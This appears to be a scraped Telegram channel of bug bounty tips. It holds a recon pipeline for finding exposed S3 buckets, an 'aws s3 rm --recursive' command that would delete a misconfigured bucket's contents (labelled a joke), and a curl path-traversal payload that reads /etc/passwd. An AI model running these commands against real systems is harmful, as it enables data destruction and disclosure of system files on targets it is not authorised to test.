🔥10👍8
Some Web Application Penetration testing or Bug Bounty notes :)
Download link: https://mega.nz/file/Jv4UyRZL#6ZuyrmCzfgDcwiKggXBJVshCTPrNwLJ3C6DXg_cfBTE
Download link: https://mega.nz/file/Jv4UyRZL#6ZuyrmCzfgDcwiKggXBJVshCTPrNwLJ3C6DXg_cfBTE
mega.nz
30.4 KB file on MEGA
👍9🔥4
echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon
aws s3 ls s3://REDACTEDCOM. s3. amazonaws. com
(If you still don't know the exact S3 Bucket you can use echo REDACTED.COM | cariddi -e -s -info)
aws s3 rm s3://REDACTEDCOM. s3. amazonaws. com --recursive
(It's joke, don't be a bad guy and report that...)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3
Keep checking my old Posts to continue your learning Process!
👍9🔥3❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Brut Security | Discussion
Community Discussion
🚨 🚨 🚨 Too many people miss critical vulnerabilities because they assume a GET request can't have a body! 🚨 🚨 🚨
This is how you can send such a request using #curl :
This is how you can send such a request using #curl :
$ curl 'target:1234/download?filename=TEST' --data 'filename=../../../../../../../etc/passwd' -X GET
👍9🔥4❤3🥰1
👍3🔥1